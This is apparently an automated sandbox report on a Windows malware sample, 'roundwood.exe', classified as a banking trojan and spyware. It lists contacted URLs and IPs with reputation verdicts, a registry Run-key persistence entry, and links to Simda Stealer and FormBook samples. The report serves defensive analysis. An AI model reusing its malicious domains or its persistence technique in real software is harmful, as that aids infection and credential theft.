http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds	svchost.exe, 0000000E.00000003.2735438447.0000017E5C37B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2634539675.0000017E5C37A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://login.microsoftonline.com/ppsecure/devicechangecredential.srf	svchost.exe, 0000000E.00000002.3271567512.0000017E5BA46000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/09/policy~	svchost.exe, 0000000E.00000002.3272985921.0000017E5C35F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://qegyval.com/login.php29	svchost.exe, 00000002.00000002.3273124458.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAA	svchost.exe, 0000000E.00000003.2559787764.0000017E5C376000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2570549062.0000017E5C37A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf	svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3271567512.0000017E5BA46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433615835.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trustAAAAA	svchost.exe, 0000000E.00000003.2570549062.0000017E5C37A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://account.live.com/InlineSignup.aspx?iww=1&id=80502	svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3271567512.0000017E5BA46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433615835.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://account.live.com/inlinesignup.aspx?iww=1&id=80600ssuer	svchost.exe, 0000000E.00000002.3271567512.0000017E5BA46000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://InquiryGrid.com/sk-domsale.php?dom=galyqaz.com&eds=YnJva2VyYWdlQHNrZW56by5jb20%3D&_isk_=7444&	login[2].htm1.2.dr	false	Avira URL Cloud: malware	unknown
http://Passport.NET/tb_	svchost.exe, 0000000E.00000002.3271960593.0000017E5BAB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2	login[2].htm1.2.dr	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd~	svchost.exe, 0000000E.00000003.2721429609.0000017E5C37B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2735438447.0000017E5C37B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i3.cdn-image.com/__media__/pics/29590/bg1.png)	login[2].htm1.2.dr	false	Avira URL Cloud: safe	unknown
http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot	login[2].htm1.2.dr	false	Avira URL Cloud: safe	unknown
http://lyxynyx.com/login.php3	svchost.exe, 00000002.00000002.3273124458.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.google.comt3	svchost.exe, 00000002.00000003.2600887126.0000000002BB3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsuer	svchost.exe, 0000000E.00000002.3271567512.0000017E5BA46000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff	login[2].htm1.2.dr	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.x	svchost.exe, 0000000E.00000003.2663768290.0000017E5C37A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://account.live.com/msangcwam	svchost.exe, 0000000E.00000002.3271567512.0000017E5BA46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2570505708.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2425829418.0000017E5C352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433649128.0000017E5C357000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433615835.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2424665623.0000017E5C329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdZ6PU	svchost.exe, 0000000E.00000003.2620633015.0000017E5C383000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2663768290.0000017E5C383000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2634539675.0000017E5C383000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.ver)	svchost.exe, 0000000E.00000002.3273209037.0000017E5CA00000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i3.cdn-image.com/__media__/pics/28905/arrrow.png)	login[2].htm1.2.dr	false	Avira URL Cloud: safe	unknown
http://galyqaz.com/display.cfm	login[2].htm1.2.dr	false	Avira URL Cloud: malware	unknown
http://passport.net/tb	svchost.exe, 0000000E.00000003.2602576677.0000017E5CAAA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf	svchost.exe, 0000000E.00000002.3271567512.0000017E5BA46000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdUHV4ZU	svchost.exe, 0000000E.00000003.2570549062.0000017E5C37A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsAAAA	svchost.exe, 0000000E.00000003.2620633015.0000017E5C383000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsds	svchost.exe, 0000000E.00000003.2721429609.0000017E5C37B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf	login[2].htm1.2.dr	false	Avira URL Cloud: safe	unknown
http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf	login[2].htm1.2.dr	false	Avira URL Cloud: safe	unknown
http://galyqaz.com/Commercial_Printing_Services.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUG	login[2].htm1.2.dr	false	Avira URL Cloud: malware	unknown
http://ww1.lysyfyj.com/?fp=ZbSrv2i18YnNfPNSqSsC6n0jQLvcDPBy65hKrYcVeZdyOk55NkMmURDujLfYrzEMz5BE5QmQN	PSSYIN6Y.htm.2.dr	false	Avira URL Cloud: phishing	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	svchost.exe, 0000000E.00000002.3272292196.0000017E5BAE3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://login.microsoftonline.com/ppsecure/ResolveUser.srfsuer	svchost.exe, 0000000E.00000002.3271567512.0000017E5BA46000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdes	svchost.exe, 0000000E.00000003.2707237589.0000017E5C37B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2691874635.0000017E5C37B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://galyqaz.com/Printing_Inks.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGtsfisSsLM8yGzAG	login[2].htm1.2.dr	false	Avira URL Cloud: malware	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdzun9	svchost.exe, 0000000E.00000003.2620633015.0000017E5C383000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ww6.galyqaz.com/GlobalSign	svchost.exe, 00000002.00000002.3271285901.000000000086D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/02/trustn	svchost.exe, 0000000E.00000002.3272924032.0000017E5C337000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.google.comtD	svchost.exe, 00000002.00000003.2600887126.0000000002BB3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ww1.lysyfyj.com/t	svchost.exe, 00000002.00000002.3272635102.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3004322075.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3188355967.0000000002B26000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://gatyfus.com/login.phpcom/login.php	svchost.exe, 00000002.00000002.3273124458.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3004653481.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ww25.lyxynyx.com/login.php?subid1=20240824-0244-06be-9bcf-3aaf77f61bcbser-AgentMozilla/4.0	svchost.exe, 00000002.00000002.3275296456.0000000009600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3275296456.0000000009608000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://106.15.137.66:8001/dh/147287063_637385.htmlindex8?d=lyrysor.com	svchost.exe, 00000002.00000003.3004451306.00000000008F1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://lysyfyj.com/login.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cC	login[1].htm0.2.dr	false	Avira URL Cloud: malware	unknown
http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff	login[2].htm1.2.dr	false	Avira URL Cloud: safe	unknown
https://dts.gnpge.com	svchost.exe, 00000002.00000003.2084959742.0000000000883000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdmlns:	svchost.exe, 0000000E.00000003.2459398968.0000017E5C352000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/scrf	svchost.exe, 0000000E.00000002.3272985921.0000017E5C35F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSID	svchost.exe, 0000000E.00000003.2425245779.0000017E5C310000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf	svchost.exe, 0000000E.00000002.3271567512.0000017E5BA46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2425245779.0000017E5C310000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://i3.cdn-image.com/__media__/pics/28903/search.png)	login[2].htm1.2.dr	false	Avira URL Cloud: safe	unknown
https://cdn.consentmanager.net	login[2].htm1.2.dr	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAA	svchost.exe, 0000000E.00000003.2634539675.0000017E5C383000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://login.microsoftonline.com/ppsecure/DeviceQuery.srf	svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433615835.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lysyvan.com/	svchost.exe, 00000002.00000002.3273079170.0000000002B8D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3188535338.00000000008AA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/soap/envelope/	svchost.exe, 0000000E.00000003.2497798842.0000017E5C30F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2498088928.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2496908758.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2497932591.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3272985921.0000017E5C35F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2496322414.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://lysyvan.com/wp-json/	svchost.exe, 00000002.00000003.2655234712.000000000085F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
3.94.10.34	lymyxid.com	United States	14618	AMAZON-AESUS	true
15.197.240.20	qexyhuv.com	United States	7430	TANDEMUS	true
64.190.63.136	www.sedoparking.com	United States	11696	NBS11696US	false
172.234.222.143	vojyqem.com	United States	20940	AKAMAI-ASN1EU	true
72.52.179.174	pltraffic7.com	United States	32244	LIQUIDWEBUS	true
154.85.183.50	qegyval.com	Seychelles	134548	DXTL-HKDXTLTseungKwanOServiceHK	true
64.225.91.73	galynuh.com	United States	14061	DIGITALOCEAN-ASNUS	true
208.91.196.145	9145.searchmagnified.com	Virgin Islands (BRITISH)	40034	CONFLUENCE-NETWORK-INCVG	false
52.34.198.229	lygyvuj.com	United States	16509	AMAZON-02US	true
199.191.50.83	galyqaz.com	Virgin Islands (BRITISH)	40034	CONFLUENCE-NETWORK-INCVG	true
13.248.169.48	pupydeq.com	United States	16509	AMAZON-02US	true
106.15.137.66	unknown	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
103.224.212.210	lyxynyx.com	Australia	133618	TRELLIAN-AS-APTrellianPtyLimitedAU	true
18.208.156.248	pupycag.com	United States	14618	AMAZON-AESUS	true
208.100.26.245	lyvyxor.com	United States	32748	STEADFASTUS	true
103.224.182.252	vofycot.com	Australia	133618	TRELLIAN-AS-APTrellianPtyLimitedAU	true
199.59.243.226	77026.bodis.com	United States	395082	BODIS-NJUS	false
103.150.11.230	gtm-sg-6l13ukk0m05.qu200.com	unknown	59253	LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG	true
3.64.163.50	puzylyp.com	United States	16509	AMAZON-02US	true
91.195.240.19	parkingpage.namecheap.com	Germany	47846	SEDO-ASDE	true
162.255.119.102	unknown	United States	22612	NAMECHEAP-NETUS	true
44.221.84.105	gadyciz.com	United States	14618	AMAZON-AESUS	true
154.212.231.82	gadyniw.com	Seychelles	133201	COMING-ASABCDEGROUPCOMPANYLIMITEDHK	true
188.114.96.3	unknown	European Union	13335	CLOUDFLARENETUS	true
85.17.31.122	unknown	Netherlands	60781	LEASEWEB-NL-AMS-01NetherlandsNL	true
69.162.80.57	lysyfyj.com	United States	46475	LIMESTONENETWORKSUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1498164
Start date and time:	2024-08-23 18:41:19 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	15
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	roundwood.exe
Detection:	MAL
Classification:	mal100.bank.troj.spyw.expl.evad.winEXE@130/42@1708/26
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 68 Number of non-executed functions: 263
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 2.23.209.135, 2.23.209.130, 2.23.209.177, 2.23.209.133, 2.23.209.182, 2.23.209.176, 2.23.209.189, 2.23.209.183, 2.23.209.179, 204.79.197.200, 13.107.21.200, 2.23.209.140, 2.23.209.158, 2.23.209.149, 2.23.209.143, 2.23.209.148, 2.23.209.154, 2.23.209.150, 2.23.209.142, 40.126.32.136, 20.190.160.17, 40.126.32.133, 40.126.32.140, 40.126.32.68, 40.126.32.74, 20.190.160.14, 20.190.160.20, 2.23.209.186, 2.23.209.185, 2.23.209.187, 2.23.209.175, 2.23.209.131, 2.23.209.144, 2.23.209.160, 2.23.209.141, 2.23.209.162, 2.23.209.161, 20.42.73.29
Excluded domains from analysis (whitelisted): www.bing.com, a-0001.a-msedge.net, prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, www-www.bing.com.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, e86303.dscx.akamaiedge.net, cn-bing-com.cn.a-0001.a-msedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, umwatson.events.data.microsoft.com, crl.verisign.com, www.tm.lg.prod.aadmsa.trafficmanager.net
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: roundwood.exe

Simulations

Behavior and APIs

Time	Type	Description
12:43:00	API Interceptor	23998x Sleep call for process: svchost.exe modified
12:43:14	API Interceptor	4x Sleep call for process: WerFault.exe modified
18:42:47	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run userinit C:\Windows\apppatch\svchost.exe
18:42:57	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run userinit C:\Windows\apppatch\svchost.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3.94.10.34	7sAylAXBOb.exe	Get hash	malicious	Unknown	Browse	thoughprobable.net/index.php
	7sAylAXBOb.exe	Get hash	malicious	Unknown	Browse	thoughprobable.net/index.php
	5a5O0c0oJP.exe	Get hash	malicious	Unknown	Browse	thoughprobable.net/index.php
	5a5O0c0oJP.exe	Get hash	malicious	Unknown	Browse	thoughprobable.net/index.php
15.197.240.20	rPHOTO09AUG2024.exe	Get hash	malicious	FormBook	Browse	www.donnavariedades.com/fo8o/
	QLLafoDdqv.exe	Get hash	malicious	FormBook	Browse	www.donnavariedades.com/fo8o/
	LF2024022.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.johnasian.com/jn17/?AjFxkn=AUopA6EtHNKAXsGcnergFbbGiEMiDoIvdiVznSugjPZqqO5N3A9xjJjKmrW26oeiLAOH&Yxl0T=CPqtRfop
	UAyH98ukuA.exe	Get hash	malicious	FormBook	Browse	www.id91920.com/fs83/?K6kd=8lIozjCqSLfPDorgIcX1ftJlpRSaTueiBgmxgg5HldscziyRpsyXpMHH8F7QpJEOuhLDcFmkzQ==&uTrL=_bj8lfEpU
	240330_unpacked	Get hash	malicious	Unknown	Browse	pimphattana.com/
64.190.63.136	http://efense.com/v3/__https:/www.duke-energy.com/find-it-duke__%3B!!No0KQ4w!udAqG0	Get hash	malicious	Unknown	Browse	sedoparking.com/frmpark/efense.com/Skenzor1/park.js
	http://leostop.com	Get hash	malicious	Unknown	Browse	ww1.leostop.com/search/tsc.php?200=NTkyMjkyNTEx&21=OC40Ni4xMjMuMzM=&681=MTcyMTk2Nzk4MTgxODg2ZmRhZDJjNzU3NTZlMTc0NmFkMjA5N2NhNTYx&crc=688a5d6af653e3a6b7501c60b740173e6added63&cv=1
	4C49F078D9E8409D98D83AEBA2C037339680B2ABF7471B599E736A7AD99FB08D.exe	Get hash	malicious	Bdaejec, Socelars	Browse	ww1.icodeps.com/?usid=27&utid=6773648594
	http://datingsitefree.pages.dev/link-2	Get hash	malicious	Unknown	Browse	ww1.ngelits.com/search/tsc.php?200=NTY0Nzc0OTIz&21=OC40Ni4xMjMuMzM=&681=MTcyMTc3NTA4OTJjZTdkMmM1NjEwYTgyMzJjZDQwY2EzZjJmNzA0YTEy&crc=5d6b65933af518cdf4d15c16efb5151a23c299ab&cv=1
	zkGOUJOnmc.elf	Get hash	malicious	Unknown	Browse	ww1.flu.cc/?usid=17&utid=
	Reporte Comercial.pdf	Get hash	malicious	Unknown	Browse	ww1.pinochoconciertos.co/search/tsc.php?200=NTcxMTM0OTU2&21=OC40Ni4xMjMuMzM=&681=MTcxOTU5ODQ3MjU1NDYzYjVjOGQ4NGY5ZTRmYjFjZTRiNzhkZjBlODAy&crc=4cd4c0d65f78dddfc0f42871994ccdfc14d83923&cv=1
	pk3hXijbfHZz69Q.exe	Get hash	malicious	FormBook	Browse	www.fullpaw.com/cr12/?jBZHx=KneTJ&t8o4ntI=LwqQubUKlntmM2qOdJDn0X3laVPQjbtHetbt4FWlj/sojHk4CP5kJb8A6VBG+/aiG1Sf
	FX6nkep9GCEHbmb.exe	Get hash	malicious	FormBook	Browse	www.fullpaw.com/cr12/?8pY=c2MXfj9hZ4EphnoP&ZPx4zB2H=LwqQubUKlntmM2qOdJDn0X3laVPQjbtHetbt4FWlj/sojHk4CP5kJb8A6VBG+/aiG1Sf
	file.exe	Get hash	malicious	CMSBrute	Browse	ww1.runfoxyrun.com/administrator/?usid=18&utid=25958169812
	SecuriteInfo.com.Trojan.StarterNET.7.17684.18588.exe	Get hash	malicious	Crypt888	Browse	sedoparking.com/search/tsc.php?200=MA==&21=OC40Ni4xMjMuMTc1&681=MTcxNjMxMjE0MWY1NmI2ZTE3YWRhNzQ1NTQ0YWU2YWE5NjFlODJjNTA3&crc=d6b1fae0fdd94b66f56f39d95a078b744354bd61&cv=1

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
lysyvan.com	spug64.exe	Get hash	malicious	Simda Stealer	Browse	172.67.136.136
	aAP32K91Qx.exe	Get hash	malicious	Simda Stealer	Browse	194.195.211.98
	szLAUZKesq.exe	Get hash	malicious	Simda Stealer	Browse	194.195.211.98
	JevgQ6OvYY.exe	Get hash	malicious	Simda Stealer	Browse	194.195.211.98
77026.bodis.com	AxgZVzUv8m.exe	Get hash	malicious	Pony	Browse	199.59.243.226
	https://www.regionvictoriaville.com/page/?ContentID=1257	Get hash	malicious	Unknown	Browse	199.59.243.226
	https://emv1.jo333.com/	Get hash	malicious	Unknown	Browse	199.59.243.226
	https://www.jo333.com/	Get hash	malicious	Unknown	Browse	199.59.243.226
	https://emv1.lqhyhy.cn/	Get hash	malicious	Unknown	Browse	199.59.243.226
	https://www.pnxubwf.cn/	Get hash	malicious	Unknown	Browse	199.59.243.226
	http://costpointfoundations.co	Get hash	malicious	Unknown	Browse	199.59.243.226
	LisectAVT_2403002A_327.dll	Get hash	malicious	Wannacry	Browse	199.59.243.226
	Ia93PTYivQ.exe	Get hash	malicious	BlackMoon, Neshta	Browse	199.59.243.226
	gUJak0onLk.elf	Get hash	malicious	Unknown	Browse	199.59.243.226
parkingpage.namecheap.com	DHL_AWB#6078538091.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	proforma invoice.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	Arrival Notice.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	qEW7hMvyV7.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	z42ordemdecomprapdf.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	shipping documents.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	MV Sunshine, ORDER.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	7MZSs0P9IvJHGya.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	NEcFLmCS7qNMwHy.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	NNj87.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
pupycag.com	spug64.exe	Get hash	malicious	Simda Stealer	Browse	34.174.78.212
pupycag.com	10627546311.zip	Get hash	malicious	Simda Stealer	Browse	199.21.76.77
galynuh.com	spug64.exe	Get hash	malicious	Simda Stealer	Browse	64.225.91.73
	kz2xIsjyEH.exe	Get hash	malicious	Simda Stealer	Browse	72.14.178.174
	10627546311.zip	Get hash	malicious	Simda Stealer	Browse	173.255.194.134
pupydeq.com	spug64.exe	Get hash	malicious	Simda Stealer	Browse	13.248.169.48
	aAP32K91Qx.exe	Get hash	malicious	Simda Stealer	Browse	194.195.211.98
	0HVVcaZuD1.exe	Get hash	malicious	Simda Stealer	Browse	194.195.211.98
	iN9u7DdJv4.exe	Get hash	malicious	Simda Stealer	Browse	194.195.211.98
	szLAUZKesq.exe	Get hash	malicious	Simda Stealer	Browse	194.195.211.98
	JevgQ6OvYY.exe	Get hash	malicious	Simda Stealer	Browse	194.195.211.98
lyvyxor.com	spug64.exe	Get hash	malicious	Simda Stealer	Browse	208.100.26.245
	kz2xIsjyEH.exe	Get hash	malicious	Simda Stealer	Browse	208.100.26.245
	10627546311.zip	Get hash	malicious	Simda Stealer	Browse	208.100.26.245
	aAP32K91Qx.exe	Get hash	malicious	Simda Stealer	Browse	208.100.26.245
	0HVVcaZuD1.exe	Get hash	malicious	Simda Stealer	Browse	208.100.26.245
	iN9u7DdJv4.exe	Get hash	malicious	Simda Stealer	Browse	208.100.26.245
	szLAUZKesq.exe	Get hash	malicious	Simda Stealer	Browse	208.100.26.245
	JevgQ6OvYY.exe	Get hash	malicious	Simda Stealer	Browse	208.100.26.245
	b1a72.exe	Get hash	malicious	Unknown	Browse	208.100.26.245

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NBS11696US	KKveTTgaAAsecNNaaaa.ppc.elf	Get hash	malicious	Unknown	Browse	64.33.213.169
	http://efense.com/v3/__https:/www.duke-energy.com/find-it-duke__%3B!!No0KQ4w!udAqG0	Get hash	malicious	Unknown	Browse	64.190.63.136
	z55FACTURADEPROFORMApdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	64.190.62.22
	Transferencia bancaria.scr.exe	Get hash	malicious	FormBook	Browse	64.190.62.22
	Udspecialiser45.exe	Get hash	malicious	FormBook, GuLoader	Browse	64.190.62.22
	DHL SHIPPING DOCUMENT.exe	Get hash	malicious	FormBook	Browse	64.190.62.22
	7qBBKk0P4l.exe	Get hash	malicious	Unknown	Browse	64.190.63.222
	mtuXDnH1Di.exe	Get hash	malicious	Unknown	Browse	64.190.63.222
	7qBBKk0P4l.exe	Get hash	malicious	Unknown	Browse	64.190.63.222
	mtuXDnH1Di.exe	Get hash	malicious	Unknown	Browse	64.190.63.222
TANDEMUS	http://solarrebater.org/	Get hash	malicious	Unknown	Browse	15.197.193.217
	https://ipfs.io/ipfs/Qmctx3fdVsajRA8gHw2wP5UHNMxaJ7D37h2UWxpgk6T6iK	Get hash	malicious	HTMLPhisher	Browse	15.197.193.217
	http://att-108024.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	15.197.193.217
